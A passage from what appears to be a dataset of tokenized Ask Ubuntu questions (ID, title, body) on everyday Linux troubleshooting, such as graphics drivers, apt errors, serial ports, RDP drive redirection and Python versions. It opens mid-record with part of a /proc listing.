07:20 kmsg -r -- r -- r -- 1 root root 0 apr 11 07:20 loadavg -r-xr-xr -- 1 root root 0 apr 11 07:20 locks -r-xr-xr -- 1 root root 0 apr 11 07:20 meminfo -r-xr-xr -- 1 root root 0 apr 11 07:20 modules lrwxrwxrwx 1 root root 11 apr 11 07:20 mounts - > self/mounts lrwxrwxrwx 1 root root 8 apr 11 07:20 net - > self/net -r -- r -- r -- 1 root root 0 apr 11 07:20 partitions lrwxrwxrwx 1 root root 64 apr 9 20:11 self - > 30908 -r-xr-xr -- 1 root root 0 apr 11 07:20 stat -r-xr-xr -- 1 root root 0 apr 11 07:20 swaps dr-xr-xr-x 1 root root 0 apr 9 20:11 sys -- wx -- x -- - 1 root root 0 apr 11 07:20 sysrq-trigger dr-xr-xr -- 2 root root 0 apr 11 07:20 sysvipc -r-xr-x -- - 1 root root 0 apr 11 07:20 uptime -r-xr-xr -- 1 root root 0 apr 11 07:20 user_beancounters -r -- r -- r -- 1 root root 0 apr 11 07:20 version -r-xr-xr -- 1 root root 0 apr 11 07:20 vmstat dr-xr-x -- - 3 root root 0 apr 11 07:20 vz
279694	no launcher after update to 3.5.0-27	new user to ubuntu here : just installed the new updates for 3.5.0-27 , after reboot , my screen changes to 1024x768 and i do n't see any launcher at all . ca n't access any settings besides the command line ( ctrl+alt+t ) . i tried to purge uninstall and reinstall nvidia-current , but still no avail . i 've tried ( unity -- reset-icons ) brings up nothing but error messages related to glx .
279695	how to remove httpd built from source	i 'm aware of the post : how do i remove apache installed with make install and use apache from the repositories ? . i installed httpd2.4 from source . but for httpd2.4 , there is no make uninstall available . are there any easy ways to purge httpd2.4 built and installed from source ?
279699	500 internal server error whenever i use apt-get	i 'm running ubuntu 12.04 i 'm getting a huge number of `` 500 internal server error '' errors whenever i try to apt-get install/upgrade . aptitude yields exactly the same errors . i know there are supposed to be `` zillions '' of threads about this on the web but none of them seem to work for me . most of them seem to be related to installing a specific package , but i get the errors whenever i use apt-get or aptitude i know this is supposed to be a generic error , but there 's nothing in the /var/log/apt folder that provides any information , or even acknowledges the error . ( the only two files in there are term.log and history.log ) . as some have recommended , i 've modified my /etc/apt/sources.list file so that the top three lines are deb http : //us-west-1.ec2.archive.ubuntu.com/ubuntu/ precise main restricted universe multiverse deb http : //us-west-1.ec2.archive.ubuntu.com/ubuntu/ precise-updates main restricted universe multiverse deb http : //us-west-1.ec2.archive.ubuntu.com/ubuntu/ precise-security main restricted universe multiverse but these are giving errors as well . can anybody please advise based on this information , or suggest how i can get a more informative error description ? thanks for help in advance here are just a few of errors i get from apt-get upgrade err http : //archive.canonical.com precise/partner amd64 packages 500 internal server error err http : //archive.canonical.com precise/partner i386 packages 500 internal server error err http : //archive.canonical.com precise/partner sources 500 internal server error err http : //dl.google.com stable/main amd64 packages 500 internal server error err http : //dl.google.com stable/main i386 packages 500 internal server error err http : //extras.ubuntu.com precise/main amd64 packages 500 internal server error err http : //extras.ubuntu.com precise/main i386 packages 500 internal server error err http : //extras.ubuntu.com precise/main sources 500 internal server error err http : //ppa.launchpad.net precise/main amd64 packages 500 internal server error err http : //ppa.launchpad.net precise/main i386 packages 500 internal server error err http : //ppa.launchpad.net precise/main sources 500 internal server error err http : //security.ubuntu.com precise-security/main amd64 packages 500 internal server error err http : //security.ubuntu.com precise-security/main i386 packages 500 internal server error err http : //security.ubuntu.com precise-security/main sources 500 internal server error err http : //security.ubuntu.com precise-security/multiverse amd64 packages 500 internal server error err http : //security.ubuntu.com precise-security/multiverse i386 packages 500 internal server error err http : //security.ubuntu.com precise-security/multiverse sources 500 internal server error err http : //security.ubuntu.com precise-security/restricted amd64 packages 500 internal server error err http : //security.ubuntu.com precise-security/restricted i386 packages 500 internal server error err http : //security.ubuntu.com precise-security/restricted sources 500 internal server error ... err http : //us-west-1.ec2.archive.ubuntu.com precise/main amd64 packages 500 internal server error err http : //us-west-1.ec2.archive.ubuntu.com precise/main i386 packages 500 internal server error err http : //us-west-1.ec2.archive.ubuntu.com precise/multiverse amd64 packages 500 internal server error err http : //us-west-1.ec2.archive.ubuntu.com precise/multiverse i386 packages 500 internal server error err http : //us-west-1.ec2.archive.ubuntu.com precise/restricted amd64 packages 500 internal server error err http : //us-west-1.ec2.archive.ubuntu.com precise/restricted i386 packages 500 internal server error err http : //us-west-1.ec2.archive.ubuntu.com precise-security/main amd64 packages 500 internal server error err http : //us-west-1.ec2.archive.ubuntu.com precise-security/main i386 packages 500 internal server error err http : //us-west-1.ec2.archive.ubuntu.com precise-security/multiverse amd64 packages 500 internal server error err http : //us-west-1.ec2.archive.ubuntu.com precise-security/multiverse i386 packages 500 internal server error err http : //us-west-1.ec2.archive.ubuntu.com precise-security/restricted amd64 packages 500 internal server error err http : //us-west-1.ec2.archive.ubuntu.com precise-security/restricted i386 packages 500 internal server error err http : //us-west-1.ec2.archive.ubuntu.com precise-security/universe amd64 packages 500 internal server error ~ ~
279702	nvidia driver update error	my computer has a ubuntu 12.04 lts . i updated with automatic actualisations . when i restart my computer ca n't access to the gui and i ca n't only access to the terminal . when i try to run the gui with sudo startx , i saw that i 've got a problem with the nvidia driver versions . i purge all nvidia drivers and i restart the computer . when it came back i saw the log window but when i write my password it came back to the log window . i can log myself with the guest account but without root privileges i ca n't do nothing so how i can restore the log window to enter into my account again and reinstall nvidia drivers . thanks
279705	is there lan topology mapping software available in ubuntu ?	i need to do a graphical map of all the layer-2 and layer-3 machines running in my lan . i do n't want a graphical tool like dia or similar , but a kind of `` graphical nmap '' which shows the real cabling of the lan ( including switches , too ! ) . in fact , something like this : http : //www.solarwinds.com/network-topology-mapper.aspx
279706	does my charm need both a relation-changed and relation-joined hook ?	i see a lot of charms with both a relation-changed and a relation-joined hook for their relations . sometimes the two hooks are even the same file , with one being a symlink to the other . however , the juju docs say that both the relation-joined and relation-changed hooks run when a relation is joined . should my charm include only one hook or the other , not both ?
279712	how to add ubuntu repositories on kubuntu ?	i have noticed that kubuntu ( i am using 12.04 version ) does n't use exactly the same repositories that ubuntu . or at least , that is what i think . for example , if i search for steam on muon software center or muon package manager , i just ca n't find it ; even if i use sudo apt-get install steam-launcher . but on ubuntu i have no problem . why ? that 's why i think ubuntu has some repositories that kubuntu does n't . in this case ( i do n't know if i 'm right ) , how can i add this ubuntu repositories ? steam is only an example . there are many packages that i ca n't find on kubuntu . another example : motorbike ( a game ) ( https : //apps.ubuntu.com/cat/applications/precise/motorbike/ ) . sudo apt-get install motorbike does n't work . regards .
279715	how can i edit an applications source code ?	i am trying to figure out how i can edit an application 's source code . the application came from the ubuntu software center , so i do not know if there is a specific folder were all the apps are so i can edit one . any suggestions ? thanks !
279717	what 's wrong with php 5.4.6 and what can i do about it ?	i recently installed ubuntu 12.10 server with the stock version of apache2 , php and mysql . something is wrong with php - first i thought it was an issue with php markdown , as the script came to a screeching halt ( after being locked for a few seconds ) on line 1420 with the error fatal error : allowed memory size of 134217728 bytes exhausted ( tried to allocate 130968 bytes ) in / ... /vendor/markdown.php on line 1420 after a while i gave up debugging php markdown , decided to temporarily disable it and move on with my project . then i got the error : fatal error : allowed memory size of 134217728 bytes exhausted ( tried to allocate 32 bytes ) in /mnt/hgfs/dropbox/projects/twork/lib/database.php on line 78 this is line 78 of database.php : $ results = $ stm- > fetchall ( pdo : :fetch_assoc ) ; and as my entire database only contains about 20 rows at the moment , i think you 'll agree that this error is utter bullshit . i recently ran this project on php 5.3 on a different system without problems . something about my current php setup is causing loops to continue for ever and running out of memory . important note : both php markdown and pdo ( mysql ) works perfectly in the cli version of php on this very same system - the problem is only with apache2 + php . are there any settings , bugs or quirks you know about that can cause this behaviour in php ? here is my phpinfo ( )
279718	ubuntu 11.10 not accepting password to change printers ?	ubuntu 11.10 not accepting root password to change printers . keeps saying password may be invalid . password works to unlock root user .
279722	will i be able to upgrade to 13.04 from 12.10 with a wubi installation ?	will it be possible to upgrade to 13.04 from 12.10 on a wubi-enabled installation ? i was looking at the schedule and noticed that wubi is being discontinued . i like the setup i have now ( windows 7 and ubuntu 12.10 ) , and would like to use 13.4 .
279723	how to setup canon pixma mg2120 scan and print	i looked a few places for this and did not find a real solution . i found a duplicate ticket which was unanswered regarding the scanner and many incorrect threads in various forums stating the scanner ca n't work . i bought mine today , and it is now working so i am posting . take this into consideration when moderating . the usa canon site does not have any linux drivers . you have to use japan or australia 's version of their official site to find what you need . scanner : mg2100 series scangear mp ver . 1.80 for linux ( debian packagearchive ) printer : mg2100 series ij printer driver ver . 3.60 for linux ( debian packagearchive ) untar and run ./install.sh once they are installed you can print as you would normally and scan using their software $ scangearmp xsane and other default scan solutions will fail to recognize the scanner .
279726	how to wipe /data on nexus 4 to install ubuntu-touch	i 'm trying to replace my current ubuntu touch developer preview with the next daily build . i 'm following the directions here https : //wiki.ubuntu.com/touch/install after entering 'phablet-flash -l ' i get the following error . not enough space in /data , found 3.9g . the directions say to `` try wiping the /data partition on your device and redeploy '' . how do you do that ? when i plug in the device it always says `` unable to mount nexus 4 unable to open mtp device ' [ usb:002,010 ] ' '' . do i need to use adb or ssh to wipe /data ?
279727	firefox ignoring it 's own preference/settings in 12.10	i am trying to turn off two things in firefox - it is re-opening every tab that was open when it was shutdown , and it always warns when i close multiple tabs . i have altered both these behaviours in preferences ( i set it to open just one defined home page on startup , and i unticked the multiple tab warning box ) , but firefox is ignoring the changes . i tried the reset firefox button in the troubleshooting page , but it still misbehaves .
279728	ca n't install intel centrino advanced-n 6205 in my lenovo x121e	i have been having troubles with my x121e wireless as described in this post . the connection is very weak , so i figured i 'd invest in a wireless card centrino advanced-n 6205 . when i plug in the card into the spare pcie slot , the computer does n't boot at all ( i ca n't even access the bios ) . trying to disable the wireless card in the bios also does n't work . ( after disabling the wireless card , saving changes and exiting , the system restarts . looking in the bios , the card is enabled again . ) also , the old wireless card sat so tight , that even without slipping once , my screwdriver just scooped out the heart of the screw , so that there is no hope of removing the old wireless card ... i am quite desperate to have a working internet connection . what can i do to disable the old wireless card and enable the new one ? is it possible to check if ubuntu even recognizes the card ( e.g . when i plug in the card right after i pass by the bios ) ? is is worth looking into trying to upgrade ( i.e . flash ) my bios ? could the bios distinguish the new wireless card in the spare slot from a wwan card and refuse to start ( without a worning ) ? that is , do i win anything by drilling out the old wireless card ?
279732	why is n't there a viable alternative to xampp in linux , i have tried everyone that i 've come across and none yet have completely installed	as per the title why is n't there a alternative to xampp which completely installs in linux
279736	x.org x server driver or amd proprietary driver ?	i see that my machine ( radeon hd 6290 ) has the option to choose either the x.org x server driver or the amd proprietary driver : i want to know which one is the recommended one in term of performance in general ? do one of them have an edge over the other ? and apart from performance , is there any stability issue with them in general ? how often are they updated ?
279739	what is the name of the icon for usb drives in ubuntu ?	i am developing a pygtk application that i would like to display the image for a usb stick from the user 's theme . however , i can not seem to pin down the name of the icon , and google is no help . consider the following code : import pygtk pygtk.require ( '2.0 ' ) require gtk icon_theme = gtk.icon_theme_get_default ( ) icon_theme.has_icon ( 'firefox ' ) # true icon_theme.has_icon ( 'google-chrome ' ) # true icon_theme.has_icon ( 'usb ' ) # false . i have also tried `` drive '' , and `` usb-drive '' . can you suggest a query ? is the usb stick icon discoverable this way ? should i look elsewhere ?
279740	how can an administrator user delete files	i have 2 different profiles / users created on my ubuntu box . both are admins . but when i 'm using the gui and i try to delete files , or move files it does n't look like i have permissions to do so . i ca n't save files that i 've created using sublime text editor either . can you tell me what i 'm missing ? is there a way around this or do i always have to use the terminal window with the sudo command ? thanks .
279743	how to open the existing file explorer and not a new one	i have a file explorer window opened and is in the background of chrome : however , when i click on the file explorer icon on the launcher , it does n't open/switch to the already opened window , but instead open a new one : how can i just open/switch to the already-opened file explorer window ? is this a known behaviour or is it a bug ?
279754	partitioning a new dell xps 15 l521x for ubuntu	i just brought home my brand new xps 15 l521x . i booted to ubuntu 12.10 using a memory stick to check that the wifi and everything is working ( it is ) . i am wanting to wipe the drive and install ubuntu , and i do n't really care about secure boot . the only description of the hard drive on the site was `` up to 750gb sata hard drive ( 7200rpm ) '' so i was a little surprised with what is actually in there : and now the good surprise ... an ssd ! the 8 gig partition is efi . my instinct is to get rid of all the crazy little partitions on /dev/sda and probably use it for my home folder . the ssd on /dev/sdb i was thinking i would use for / so the os would boot quickly . my questions : is there enough space on the ~29 gig /dev/sdb drive for the os ? is deleting the efi partition a mistake ? does it mess up firmware upgrades ? is there any reason to keep any of those oem partitions if i am never going to use windows ?
279756	how to get my script to start up !	i am trying to get a simple script to run at startup my script looks like : # ! /bin/bash # # # begin init info # provides : litecoind daemon # required-start : # required-stop : # default-start : # default-stop : # short-description : start litecoind # description : # # # end init info < /pre > do start ( ) { litecoind -daemon -- start } exit 0 i 've added it to /etc/init.d/litecoin sudo chmod +x /etc/init.d/litecoin sudo update-rc.d litecoin defaults for some reason it is not starting up , forgive my ignorance first time using ubuntu .
279757	minecraft on cairo dock opens another instance	so i `` installed '' minecraft using this video http : //www.youtube.com/watch ? v=nzibcwpdsa4 and put it on my cairo dock . however whenever i open it , it opens another instance of the icon . is there any way to fix this ?
279762	ca n't connect to wpa2 enterprise peap	my university uses wpa2 enterprise encryption for students to login their wireless . in networkmanager i have keyed in everything that they needed security : wpa & wpa2 enterprise authentication : protected eap ( peap ) ca certificate is not needed peap version : automatic inner authentication : mschapv2 username and password are correct . everytime i try to connect , i get a window asking me to input my password over and over again
279764	why is double-finger scrolling smooth in some applications but in others not so much ?	on my system76 laptop , i 've noticed that the double scroll works great in some applications , and not so great in others . for example , as far as web browsers go , the double finger scroll is smooth in firefox , yet less smooth , even `` jumpy '' in chrome . has anybody else noticed this and do they know the reason why ?
279765	files do not save in /media/data	new to ubuntu , a free os of greatness , i followed the step by step procedure in one of the online resources of ubuntu for installing the os . as instructed , i learned that i have to create the following spaces in the drive : 1.root 2.home 3.swap . concerning home partition , where it is said `` your files are kept , '' the instruction is to enter in its mount point : `` /media/data . '' however , after the installation , when i 'm trying to transfer all my files into the new os , a window appeared noting , `` the volume `` filesystem root '' has only 95.8mb disc space remaining . '' what went wrong ? why are my files not saved in the home partition ? please help . i 'm a newbie ubuntu user .
279772	4gb sd recognized as 1.6gb	i used as dd command to make my 4gb sd card bootable for arch linux arm as explained here since it did n't work i tried formatting the card in my ubuntu again but now it recognizes it as a 1.6gb card and a 32mb card . is there any way i can restore my card ?
279773	what is icon-theme.cache ?	when i run the following command on my lubuntu 12.10 [ 11:09 pm ] ~ $ find /usr/share/icons/ -iname icon-theme.cache -type f i get the following ( after adding the last modified date and size ) : /usr/share/icons/lubuntu/icon-theme.cache 20121125 61.2 kib /usr/share/icons/humanity-dark/icon-theme.cache 20120810 40.6 kib /usr/share/icons/humanity/icon-theme.cache 20120810 931.9 kib /usr/share/icons/gnome/icon-theme.cache 20121017 65.8 mib /usr/share/icons/ubuntu-mono-light/icon-theme.cache 20130408 140.0 kib /usr/share/icons/loginicons/icon-theme.cache 20130408 628 bytes /usr/share/icons/ubuntu-mono-dark/icon-theme.cache 20130408 139.9 kib /usr/share/icons/hicolor/icon-theme.cache 20130406 12.4 mib /usr/share/icons/elementary-mono-dark/icon-theme.cache 20120926 12.4 kib and all these files , as shown in the example below , are of type truetype font data : [ 11:09 pm ] ~ $ file /usr/share/icons/hicolor/icon-theme.cache /usr/share/icons/hicolor/icon-theme.cache : truetype font data my questions , all closely related , are : what is icon-theme.cache and what is its function ? what is the meaning of cache in these filenames ? the cache tag definition is this : `` a cache stores temporary data nearby so that it can be retrieved much more quickly than fetching it from the real backing store ( disk , network ) , or recalculating some result all over again '' . why are the file sizes so diverse ? are the gnome and hicolor ones the largest because they provide the fallback icons ( as i read somewhere ) ? what about the dates ? i 'm only sure about the ubuntu-mono ones because they came along when i installed light-themes on 20130408 . so do these files get modified during the course of switching themes or are the dates just a reflection of the date of installation ?
279775	how to save web pages completely	i want to save web pages for offline reading . currently i save it using firefox . for bulk saving i want to automate the process using a script ( or what about a web site copier like webhttrack ? ) . from terminal i can save the .html file of the url ( using wget url ) but ca n't view the page as no image , .js , etc . sometimes i want to save numbered pages , ie . http : //askubuntu.com/posts/1 , http : //askubuntu.com/posts/2 , http : //askubuntu.com/posts/3 , http : //askubuntu.com/posts/4 .. ( like mirroring ) in one shot . how can i bulk save web pages with all necessary file to view it properly ?
279776	fglrx vs fglrx-updates and ubuntu ( quantal ) vs amd 's driver ?	when trying to decide which proprietary driver i want , i was always a bit confused as to whether to choose fglrx or fglrx-updates . both appear to contain the proprietary driver , but i do n't know anything more than that , or in which situations where one should be used over the other . my next question is whether to use the fglrx driver provided from ubuntu , or use the one from amd 's driver installer . i 'm interested in a stable driver pretty much , so no 13.3 beta . amd appears to be providing version 9.012 . ubuntu appears to be providing 9.000 judging by package name ( in both fglrx and fglrx-updates ) . it would seem amd 's driver is more up-to-date , but is this really true , or maybe ubuntu 's version is also 9.012 ? maybe there 's no difference at all between 9.000 and 9.012 ?
279779	3rd and 4th serial port not configured on startup	ubuntu 12.04.2 lts 3.2.0-39-generic-pae hi there , the pc i 'm working on has 4 serial ports . ttys0 and ttys1 function properly straight from startup , ttys2 and ttys3 do not . here is the relevant dmesg messages : serial : 8250/16550 driver , 32 ports , irq sharing enabled [ 1.050346 ] serial8250 : ttys0 at i/o 0x3f8 ( irq = 4 ) is a 16550a [ 1.100595 ] serial8250 : ttys1 at i/o 0x2f8 ( irq = 3 ) is a 16550a [ 1.144567 ] serial8250 : ttys2 at i/o 0x3e8 ( irq = 4 ) is a 16550a [ 1.188577 ] serial8250 : ttys3 at i/o 0x2e8 ( irq = 3 ) is a 16550a [ 1.383941 ] isapnp : no plug & play device found [ 1.449179 ] 00:06 : ttys0 at i/o 0x3f8 ( irq = 4 ) is a 16550a [ 1.477192 ] 00:07 : ttys1 at i/o 0x2f8 ( irq = 3 ) is a 16550a [ 1.498296 ] 00:08 : ttys2 at i/o 0x3e8 ( irq = 7 ) is a 16550a [ 1.524994 ] 00:09 : ttys3 at i/o 0x2e8 ( irq = 7 ) is a 16550a to get them to function i have to re-configure them by invoking : setserial /dev/ttys3 baud_base 115200 auto_irq skip_test autoconfig which i found here before re-configuring the serial port , setserial reports the following for the serial ports : /dev/ttys0 , uart : 16550a , port : 0x03f8 , irq : 4 /dev/ttys1 , uart : 16550a , port : 0x02f8 , irq : 3 /dev/ttys2 , uart : 16550a , port : 0x03e8 , irq : 7 /dev/ttys3 , uart : 16550a , port : 0x02e8 , irq : 7 after re-configuring the fllowing is reported : /dev/ttys0 , uart : 16550a , port : 0x03f8 , irq : 4 /dev/ttys1 , uart : 16550a , port : 0x02f8 , irq : 3 /dev/ttys2 , uart : 16550a , port : 0x03e8 , irq : 0 /dev/ttys3 , uart : 16550a , port : 0x02e8 , irq : 0 the serial ports are provided by a fintek f81866 chip which supports irq shareing so having the initial irqs set to 7 should not be a problem . while having the irqs set to 0 is a problem from what i understand as according to the setserial man page irq 0 is reserved for timer channel 0 . the fintek f81866 chip supports up to 6 serial ports . so i tried adding 8250.nr_uarts=8 to the bootline but , this did nothing ( as far as i know , i do n't know of a way to confirm what boot parameters have been passed ) . whats is going wrong ? why is n't ttys2 and ttys3 being configured correctly at startup ? how can i fix this ? what would i need to do so that they are configured correctly at startup ( short of making my own init script ) ? thanks in advance !
279796	localhost always show welcome to nginx !	i was working fine on my projects . after restarting my machine , i tried to access a local project and i get the message `` welcome to nginx ! '' even if i want to open phpmyadmin . what is the problem and how i can restore my environment ? i am running ubuntu 12.04 lts
279798	find -exec grep does not work	i need to use a find command in a script with ssh and grep together . something like this : ssh user @ host find /var/log -type f -mtime 1 -exec grep -i -f error warn { } \ ; but it says , that there is no argument for -exec . what should i do to fix this ?
279801	ubuntu wo n't boot from usb 12.04	i 've tried 4 different versions of ubuntu now and i ca n't get them to boot . i have tried both universal usb and unetbootin with no luck . i have 2 different usb drives i 'm trying to use both 4 gigabytes . every single time i try to either run ubuntu without installing or try to install onto harddrive it just starts and the machine powers off and restarts . i have successfully booted on my laptop from both usb drives ... why is n't this working on my desktop ?
279810	best way to connect to webdav on sharepoint with ntlm authentication ubuntu 12.10	i am currently trying to connect to a private sharepoint workspace ( on our intranet ) using webdav that uses ntlm using davfs2 . however i am failing due to this bug : https : //bugs.launchpad.net/ubuntu/+source/davfs2/+bug/1091183 ( no ntlm support in davfs2 ) . does anyone have any alternative suggestions for connecting - i would be as happy with a two-way syncing solution as with a fuse solution .
279811	nas / 3tb disks / boot from usb	i 've got an old intel d510mo motherboard . i would like to use build myself a mini nas ( raid level 1 ) . the problem is it only has 2 sata ports and i would like use , at least , 3 tb disks . from my understanding it should be possible to put the /boot partition on an usb drive and bios boot to the usb drive and from there on load the / filesystem from the disks . grub must be installed on the usb drive . a second question , with all the fuzz about 4k sectors and alignment , is there anything i can/must do in the installer or are the partitions going to be aligned automatically ? i 'm going to use the latest ubuntu server 12.04 lts version . third and last question , raid stripe size , should i investigate further or just live with the defaults ?
279812	file copy freezing with large network copies	i 'm using version 12.10 . when i do large file copy from windows network share it always hangs the copy process . rest of machine is fine , just the copy process is hung . i connect to the share by launching home folder then clicking on the network section . from there i can find my windows share . i 'm finding this very annoying as i have over 2tb of data to migrate from my old windows environment to ubuntu .
279816	how to run whatsapp on ubuntu ?	in windows , you can run android application using bluestack . i was wondering , is there any way these apps can be run on ubuntu 12.04 ?
279819	mount on filesystem of type ecryptfs explicitly disallowed due to known incompatibilities	i get this error when i 'm trying to do sudo mount -t ecryptfs folder1 folder2 in my home folder ( encrypted by ubuntu ) i tried the same command but folders at /tmp , it worked as expected . the error message i got : ecryptfs_unlink_sigs ecryptfs_key_bytes=16 ecryptfs_cipher=aes ecryptfs_sig=66cea2017ad38853 error mounting ecryptfs : [ -22 ] invalid argument in /var/log/syslog : kernel : [ 197.621331 ] mount on filesystem of type ecryptfs explicitly disallowed due to known incompatibilities mount.ecryptfs : failed to perform ecryptfs mount : [ invalid argument ] kernel : [ 197.659287 ] reading sb failed ; rc = [ -22 ]
279822	chromebook : map search key to ctrl , ubuntu	i 've got ubuntu running on chromebook using crouton . how do i map the search key to the ctrl action . similar to this , swapping the caps lock key and the ctrl key . /usr/bin/setxkbmap -option `` ctrl : swapcaps '' update i 've still had no luck : - ( , i 've swapping the like this , in a ~/.xmodmap file : clear control clear mod4 keycode 105 = keycode 206 = keycode 37 = control_l nosymbol control_l keycode 134 = control_r nosymbol control_r keycode 133 = super_l nosymbol super_l add control = control_l add control = control_r add mod4 = super_l but still no luck , any help suggestion would be much appretaited .
279825	is it possible to take a snapshot of / ( or other ) filesystem , like in virtualbox ?	taking snapshot of root partition will make possible to roll back to previous state . this is very helpful when something went wrong and/or data loss occurs . this feature can be seen in virtualbox hdd and the persistence option in live cd . unlike backup it uses incremental data usage thus less data size . is it possible to take a snapshot of a file system ?
279827	will ubuntu work smoothly with these computer specifications ?	mainly i want a linux system for web developing . my system has following specifications : intel p4 2.66 ghz 500mb ram 160gb harddisk i heard that with removing some features during installation , we can use ubuntu smoothly . so which kind of features should i remove to accomplish this ?
279830	resetting original display drivers	when i first installed ubuntu on my system , the display worked pretty much exactly how i wanted it to . i decided that it could n't hurt to install drivers through jockey-kde . this made the screen resolution horrible and tiny , so i deactivated it , but now my display settings appear to be bare bones and medicore . i 'd really just like to reinstall the display portion and have ubuntu re-auto-configure it , but i do n't know how to do this without reinstalling ubuntu alltogether . i 'm running 12.10 desktop , btw . any help would be greatly appreciated !
279832	changing distribution and keeping user files	i am using kubuntu now , and hava partition as /home seperate from / . i want to install xubuntu instead of kubuntu . can i do that without affecting my files at /home and is there any disadvanteges of doing so ?
279833	redirecting a locally mounted windows smb share ( cifs ) to a windows terminal server session	i have been living in the linux world only 2 months so far and have hit a problem with the above mentioned task , now explained in more detail : our company has 2 windows terminal servers to which the different clients connect from different branch offices . i have now tried to incorporate a lubuntu 12.10 pc which is supposed to solely act as a remote-desktop client . as rdp-client i am using freerdp ( xfreerdp ) which works like a charm but when i try to access the redirected mounted windows share i get the following error : open folder ( title ) \\tsclient\office is not accessible . you might not have permission to use this network resource . contact the administrator of this server to find out if you have access permissions . the syntax i use for the connection : xfreerdp -- sec rdp -- no-nla -- ignore-certificate -g 1680x1050 -f -- plugin rdpdr -- data printer : hplj5200_smb : '' hp laserjet 5 '' -- plugin rdpdr -- data disk : transfer : /home/apl03/transfer -- plugin rdpdr -- data disk : office : /media/office -- 192.168.0.101 as you can see i am redirecting a printer and 2 folders . i can successfully print with the printer from the windows terminal session and i can access the folder /home/apl03/transfer without any problems . what does not work is accessing the 2nd folder /media/office . /media/office is a share of the local file server of that branch office . the user apl03 has an account in the local active directory and file access from lubuntu itself to the share works without any problems ( read & write ) the share is mounted in /etc/fstab via //192.168.1.1/office /media/office cifs credentials=/home/apl03/.smbcredentials , file_mode=0777 , dir_mode=0777 0 0 the permissions of /media/office on the lubuntu file system are as follows : drwxrwxrwx 2 root root 0 mär 27 15:26 office it may well be a permission issue but i do n't know where else to look . both in the filesystem and in fstab i made the folder available . i am grateful for any suggestions or pointers . update the log output on the terminal : loading plugin rdpdr connected to 192.168.0.103:3389 null server certificate freerdp_load_library_symbol : failed to open /usr/lib/i386-linux-gnu/freerdp/ -- plugin.so : /usr/lib/i386-linux-gnu/freerdp/ -- plugin.so : kann die shared-object-datei nicht öffnen : datei oder verzeichnis nicht gefunden freerdp_load_plugin : failed to load -- plugin/deviceserviceentry freerdp_load_library_symbol : failed to load /usr/lib/i386-linux-gnu/freerdp/rdpdr.so : /usr/lib/i386-linux-gnu/freerdp/rdpdr.so : undefined symbol : deviceserviceentry freerdp_load_plugin : failed to load rdpdr/deviceserviceentry freerdp_load_library_symbol : failed to open /usr/lib/i386-linux-gnu/freerdp/ -- data.so : /usr/lib/i386-linux-gnu/freerdp/ -- data.so : kann die shared-object-datei nicht öffnen : datei oder verzeichnis nicht gefunden freerdp_load_plugin : failed to load -- data/deviceserviceentry freerdp_load_library_symbol : failed to open /usr/lib/i386-linux-gnu/freerdp/ -- plugin.so : /usr/lib/i386-linux-gnu/freerdp/ -- plugin.so : kann die shared-object-datei nicht öffnen : datei oder verzeichnis nicht gefunden freerdp_load_plugin : failed to load -- plugin/deviceserviceentry freerdp_load_library_symbol : failed to load /usr/lib/i386-linux-gnu/freerdp/rdpdr.so : /usr/lib/i386-linux-gnu/freerdp/rdpdr.so : undefined symbol : deviceserviceentry freerdp_load_plugin : failed to load rdpdr/deviceserviceentry freerdp_load_library_symbol : failed to open /usr/lib/i386-linux-gnu/freerdp/ -- data.so : /usr/lib/i386-linux-gnu/freerdp/ -- data.so : kann die shared-object-datei nicht öffnen : datei oder verzeichnis nicht gefunden freerdp_load_plugin : failed to load -- data/deviceserviceentry freerdp_load_library_symbol : failed to open /usr/lib/i386-linux-gnu/freerdp/-plugin.so : /usr/lib/i386-linux-gnu/freerdp/-plugin.so : kann die shared-object-datei nicht öffnen : datei oder verzeichnis nicht gefunden freerdp_load_plugin : failed to load -plugin/deviceserviceentry freerdp_load_library_symbol : failed to load /usr/lib/i386-linux-gnu/freerdp/rdpdr.so : /usr/lib/i386-linux-gnu/freerdp/rdpdr.so : undefined symbol : deviceserviceentry freerdp_load_plugin : failed to load rdpdr/deviceserviceentry freerdp_load_library_symbol : failed to open /usr/lib/i386-linux-gnu/freerdp/ -- data.so : /usr/lib/i386-linux-gnu/freerdp/ -- data.so : kann die shared-object-datei nicht öffnen : datei oder verzeichnis nicht gefunden freerdp_load_plugin : failed to load -- data/deviceserviceentry registered device # 1 : prn1 ( type=4 id=1 ) registered device # 2 : prn2 ( type=4 id=2 ) registered device # 3 : transfer ( type=8 id=3 ) registered device # 4 : office ( type=8 id=4 ) despite there being some strange errors access to the `` transfer '' folder works just fine . if i only redirect that folder and remove the other it still gives these errors but it does work . also the fact that all devices are logged as registered seems to indicate that the errors are n't about that . i also tried changing the ownership of `` /media/office '' to the user apl03 with not effect . update i now managed to recreate the problem in a test environment using 2 laptops . although they have the same version of ubuntu , same config for samba.conf & fstab ( i checked with `` diff '' ) , the one works and the other does n't . file ownerships and rights are the same and even the username is identical . in both cases the folder shows up in the session but on one client it 's not accessible - just like in our company . for the fun of it i tried `` rdesktop '' instead of `` freerdp '' and at least in my test setup everything seems to work with that . i will check if it 's the same at work . if it is i guess this can be closed and attributed to a bug in `` freerdp '' for reference , this is the equivalent rdesktop command i used : rdesktop -z -p -x m -a 16 -k de -g 1680x1050 -f -r disk : transfer=/home/apl03/transfer , office=/media/office 192.168.0.101
279834	does libc6-i386 compile 64-bit executables ?	i have libc6-i386 installed on my 64-bit capable intel i3 processor . should i rather install the amd64-versions of libc or stick to the i386 as i have an intel processor ?
279837	moving ubuntu from one computer to another	i have my laptop pc with windows 7 and ubuntu 12.10 as secondary os . i was using wubi installer to create ext4 partitions for ubuntu in the same partition as windows . i have a lot of complicated software installed on ubuntu ( it would take a lot of time to install everything again on a fresh ubuntu ) and i would like to move that ubuntu ext4 partition to my new pc which also has windows 7 and make it bootable . is it possible to move that partition and keep all the software intact and make it bootable and what would be possible steps how to do this ? maybe someone could point me to some kind of tutorial for such a task ?
279847	how do i get python2.7 back to the command `` python '' ?	when i do the command python i get the folowing . python 2.6.8 ( unknown , apr 9 2013 , 19:12:12 ) [ gcc 4.7.2 ] on linux3 type `` help '' , `` copyright '' , `` credits '' or `` license '' for more information . i want to have python2.7 back to that command . so i have this : python 2.7.3 ( default , sep 26 2012 , 21:51:14 ) [ gcc 4.7.2 ] on linux2 type `` help '' , `` copyright '' , `` credits '' or `` license '' for more information . > > > i have already tried to change the symlink in /usr/bin/python but do n't work : ( . i am also afraid that some programs will break .
